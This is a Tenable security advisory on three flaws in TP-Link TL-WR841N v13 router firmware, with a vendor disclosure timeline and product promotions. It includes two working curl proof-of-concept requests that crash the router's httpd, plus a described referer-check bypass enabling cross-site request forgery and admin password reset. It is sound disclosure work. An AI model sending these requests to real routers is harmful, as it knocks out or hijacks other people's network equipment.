Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] TP-Link TL-WRN841N Multiple Vulnerabilities

Critical

Synopsis

Tenable was recently investigating TP-Link's TL-WR841N v13 using firmware 0.9.1 4.16 v0348.0 (listed as TL-WR841N(US)_V13_180119 on the download page). As a result, Tenable found multiple vulnerabilities.

CVE-2018-15700: httpd Denial of Service via Referer Header

A locally connected user sending an HTTP request with a missing protocol string in the "Referer" field will result in the httpd service terminating. We believe this is a NULL pointer dereference error in the http_parser_main function. The problem starts with a memcmp looking for "http://" in the first seven bytes of the "Referer" field. Only if this succeeds will a "Referer" string variable be initialized. When the memcmp fails the program flow still continues and attempts string operations on the uninitialized NULL string. The resulting crash requires a router reboot to revive httpd web interface.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: DOS' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --compressed

CVE-2018-15701: httpd Denial of Service via Cookie Header

Crafting an HTTP request with an HTTP "Cookie" field of "Authorization;" will result in the httpd service terminating. Again, a router reboot is required to revive the web interface. We believe this is another parsing error in "http_parser_main".

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://tplinkwifi.net/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: Authorization;' --compressed

CVE-2018-15702: XSRF due to Incomplete Referer Check

In the http_parser_main function, referer whitelisting is accomplished using strncmp with a length field derived from "tplinklogin.net", "tplinkwifi.net", or router IP strings. Since strncmp is only comparing the first few characters of the referer domain string, an attacker can pass this check by crafting a domain or subdomain of "tplinklogin.net**", "tplinkwifi.net*", or "<router's IP>*".

This issue is magnified in severity due to a previously disclosed but unpatched authentication bypass vulnerability (CVE-2018-11714). This allows a remote attacker to perform XSRF to various sensitive cgi scripts. A remote attacker is able enable remote management and reset the router admin password.

Solution

Currently no solution exists. At time of publication, the most recent firmware version on TP-Link's website is listed as TL-WR841N(US)_V13_180119 which is the vulnerable firmware version (0.9.1 4.16 v0348.0).

Disclosure Timeline

07-02-2018 - Tenable sends vulnerability write up and proof of concepts to TP-Link.
07-18-2018 - Tenable asks TP-Link for acknowledgement.
07-18-2018 - TP-Link says all the bugs already fixed. Suggests Tenable verifies using the latest firmware.
07-27-2018 - Tenable confirms the vulnerabilities still exist in the latest build (0.9.1 4.16 v0348.0 Build 180119 Rel 66498n). Tenable asks if there is a more recent unpublished build.
07-27-2018 - TP-Link says they will check the firmware and let Tenable know.
08-27-2018 - Tenable asks for an update.
08-27-2018 - TP-Link asks for hardware version and firmware version.
08-27-2018 - Tenable responds TL-WR841N V13 0.9.1 4.16 v0348.0 Build 180119 Rel 66498n
08-27-2018 - TP-Link sends a beta firmware for Tenable to test.
08-27-2018 - TP-Link follows up that they hope for feedback ASAP.
08-27-2018 - Tenable can't download the rar attachment via email.
08-27-2018 - TP-Link suggests using we-transfer.
08-27-2018 - Tenable agrees.
08-30-2018 - Tenable asks TP-Link for an update.
08-30-2018 - TP-Link says they sent a we-transfer. They'll try again.
08-30-2018 - Tenable receive receipt of the firmware (0.9.1 4.16 v0348.0 Build 180821 Rel.42708n(Beta)) and confirms that two vulnerabilities still exist.
08-30-2018 - TP-Link notifies Tenable of another we-transfer.
08-30-2018 - Tenable informs TP-Link that they sent the exact same firmware as before.
09-20-2018 - Tenable asks TP-Link for an update.
09-20-2018 - TP-Link says they already sent the beta version.
09-20-2018 - Tenable says they haven't received anything new.
09-20-2018 - TP-Link says we-transfer informed them that Tenable downloaded the firmware. Asks Tenable for an email address that doesn't block rar files.
09-20-2018 - Tenable reiterates that the last downloaded version was vulnerable. Tenable asks for a new version via we-transfer.
10-01-2018 - Tenable reminds TP-Link that today is the 90 day disclosure day.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2018-27
Credit:
David Wells
CVSSv2 Base / Temporal Score:
9.3/7.5
CVSSv2 Vector:
AV:N/AC:M/Au:N/C:C/I:C/A:C
Nessus Plugin ID: 117861
Affected Products:
TL-WR841N v13 0.9.1 4.16 v0348.0
Risk Factor:
Critical

Advisory Timeline

10-01-2018 - [R1] Initial Release

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training